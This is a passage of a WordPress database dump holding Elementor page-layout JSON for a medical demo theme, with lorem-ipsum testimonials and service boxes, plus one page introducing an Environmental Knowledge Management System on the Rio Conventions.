lungs\",\"number_color\":\"#ffffff\",\"typography_number_typography\":\"custom\",\"typography_number_font_size\":{\"unit\":\"px\",\"size\":50},\"title_color\":\"#ffffff\",\"typography_title_typography\":\"custom\",\"typography_title_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_title_font_weight\":\"600\",\"typography_title_text_transform\":\"uppercase\",\"typography_title_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"typography_number_font_size_tablet\":{\"unit\":\"px\",\"size\":30},\"typography_title_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"counter\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"t2gvx2f\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_159211.jpg\",\"id\":156},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#364e66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8},\"padding\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cq7te54\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"unlkljg\",\"elType\":\"widget\",\"settings\":{\"title\":\"What Our Patients Say\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":1.4}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ayvp0xr\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"rot3ixr\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"gx8goxj\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fc8q2qe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"1gdmbbl\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Saperet periculis principes in vis, est ne minim admodum. Ignota perpetua torquatos id ius, ut consul probatus conceptam est, ea sit graecis singulis. Maiorum pertinacia ea per, has quis euripidis at. Persius civibus eligendi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_428339.jpg\",\"id\":153},\"testimonial_name\":\"Mike Wright\",\"testimonial_job\":\"Patient #1\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"eo56seo\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"y7o9kxz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Sed tale aeterno saperet ex. Placerat quaestio ea ius, eos vocent euismod ex, alia recusabo signiferumque pro no. Qui mel dictas erroribus. Eros ullum no est, ei nisl wisi ius. Bonorum expetenda et eum. Ius dolor inimicus.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_324658.jpg\",\"id\":152},\"testimonial_name\":\"Nancy Green\",\"testimonial_job\":\"Patient #3\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true},{\"id\":\"ea8zdxf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"jzgwrdz\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel. Ad per autem dicta consul, te corpora nostrum consulatu quo. An doming quodsi usu, id vis unum facilisi, vivendo nonumes hendrerit.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_301284.jpg\",\"id\":151},\"testimonial_name\":\"Frances Lopez\",\"testimonial_job\":\"Patient #2\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"},{\"id\":\"7fr075g\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"rgba(255,255,255,0.2)\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"6kl9wra\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Morbi in ipsum sit amet pede facilisis laoreet. Donec lacus nunc, viverra nec, blandit vel, egestas et, augue. Vestibulum tincidunt malesuada ultrices enim. Curabitur sit amet mauris. Morbi in dui quis est pulvinar facilisi.\",\"testimonial_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_91227.jpg\",\"id\":150},\"testimonial_name\":\"Nick Smith\",\"testimonial_job\":\"Patient #4\",\"content_content_color\":\"#ffffff\",\"content_typography_typography\":\"custom\",\"content_typography_font_size\":{\"unit\":\"px\",\"size\":16},\"name_text_color\":\"#ffffff\",\"name_typography_typography\":\"custom\",\"name_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"name_typography_font_weight\":\"600\",\"name_typography_text_transform\":\"uppercase\",\"name_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"job_text_color\":\"#ffffff\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12}},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"yb7q3d9\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bm6vhpr\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"393qxl0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest from blog\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":18}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"uqjuvgf\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"weight\":{\"unit\":\"px\",\"size\":6},\"color\":\"#01aef0\",\"width\":{\"unit\":\"px\",\"size\":40},\"align\":\"center\",\"gap\":{\"unit\":\"px\",\"size\":16},\"_css_classes\":\"no-margin\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"liad1d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"mrc2wel\",\"elType\":\"widget\",\"settings\":{\"items\":\"3\",\"tablet\":\"2\",\"mobile\":\"1\",\"count\":\"6\",\"author\":\"false\",\"cat\":\"false\",\"excerpt_length\":\"15\",\"readmore_text\":\"Learn More\"},\"elements\":[],\"widgetType\":\"oew-blog-carousel\"}],\"isInner\":false}],\"isInner\":false}]'),(3047,392,'_elementor_version','0.4'),(3048,392,'_elementor_template_type','wp-page'),(3050,393,'_elementor_controls_usage','a:0:{}'),(3051,393,'_wp_page_template','default'),(3052,393,'_elementor_edit_mode','builder'),(3053,393,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":880},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/medical.oceanwp.org\\/wp-content\\/uploads\\/2017\\/09\\/img_247786.jpg\",\"id\":148},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#364e66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics, Institutions Resources, and Other useful data.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"vmjwleh\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"40\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3a3bcf4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"ho7i20h\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"xy8zxqm\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-heartbeat\",\"title_text\":\"Cardiac Rehab\",\"description_text\":\"Aenean vulputate viverra odio eget dignissim. Aliquam suscipit titus ipsum velit lacus scelerisque.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ze0ehm9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"73ci3v0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"lb2mzdw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-medkit\",\"title_text\":\"Gynecology\",\"description_text\":\"Phasellus lacus erat, sagittis eu consequat ac, luctus faucibus cati libero mauris vel nulla.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"ohhadxb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"w62h9z0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#01aef0\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"1q7ujfs\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-stethoscope\",\"title_text\":\"Symptom Check\",\"description_text\":\"Mauris sodales felis ut porttitor placerat. Curabitur et lorem consectetur finibus ipsum.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"vn30vxq\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"gcyn1zg\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#5fc6ef\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"20\",\"bottom\":\"30\",\"left\":\"20\",\"isLinked\":false},\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"hnlb77z\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-clock-o\",\"title_text\":\"Rehabilitation\",\"description_text\":\"Ad qui facete melius dolores. Elitr invidunt vix ex, agam convenire democritum an mel.\",\"primary_color\":\"#005296\",\"icon_size\":{\"unit\":\"px\",\"size\":50},\"icon_padding\":{\"unit\":\"px\",\"size\":26},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_text_transform\":\"uppercase\",\"title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"description_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"f41bjy0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Learn More\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_family\":\"Dosis\",\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"button_text_color\":\"#ffffff\",\"background_color\":\"#005296\",\"hover_color\":\"#005296\",\"button_background_hover_color\":\"rgba(255,255,255,0)\",\"button_hover_border_color\":\"#005296\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"border_color\":\"#005296\",\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"xf3xggu\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"756a496\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"gjruaqu\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"dckxccw\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-user-md\",\"title_text\":\"General Surgery\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"left\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"hx0bfps\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"98dsrav\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-hospital-o\",\"title_text\":\"Pediatric Clinic\",\"description_text\":\"Donec ut sapien vel erat suscipit tincidunt in quis odio. Aliquam id lacinia turpis, et auctor eros. Pellentesque aliquet, diam non varius convallis, erat diam facilisis nibh, ultricies.hospital\",\"position\":\"left\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false},{\"id\":\"az3bsd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100},\"elements\":[{\"id\":\"p6fdudg\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-ambulance\",\"title_text\":\"Emergency Departments\",\"description_text\":\"Quisque porta felis in consectetur faucibus. Aenean viverra, dui a ultrices fermentum, nunc elit sagittis nisi, ut sollicitudin metus enim vitae augue. Aenean ornare sagittis sapien.\",\"position\":\"right\",\"primary_color\":\"#5fc6ef\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"},{\"id\":\"qg9bbu9\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":2},\"color\":\"#eaeaea\",\"text\":\"Divider\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"ahzx2ew\",\"elType\":\"widget\",\"settings\":{\"view\":\"stacked\",\"icon\":\"fa fa-wechat\",\"title_text\":\"24\\/7 Services\",\"description_text\":\"Feugiat vel erat non molestie. testus Nulla arcu nisi, pretium sed tincidunt at, commodo eget lorem. In hac habitasse platea dictumst. Nam eleifend leo euismod. Aliquam ipsum dolor.\",\"position\":\"right\",\"primary_color\":\"#01aef0\",\"icon_size\":{\"unit\":\"px\",\"size\":55},\"icon_padding\":{\"unit\":\"px\",\"size\":30},\"border_radius\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"content_vertical_alignment\":\"middle\",\"description_typography_typography\":\"custom\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":14}},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"42yxmso\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#fcfcfc\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#eaeaea\",\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e898dc3\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_para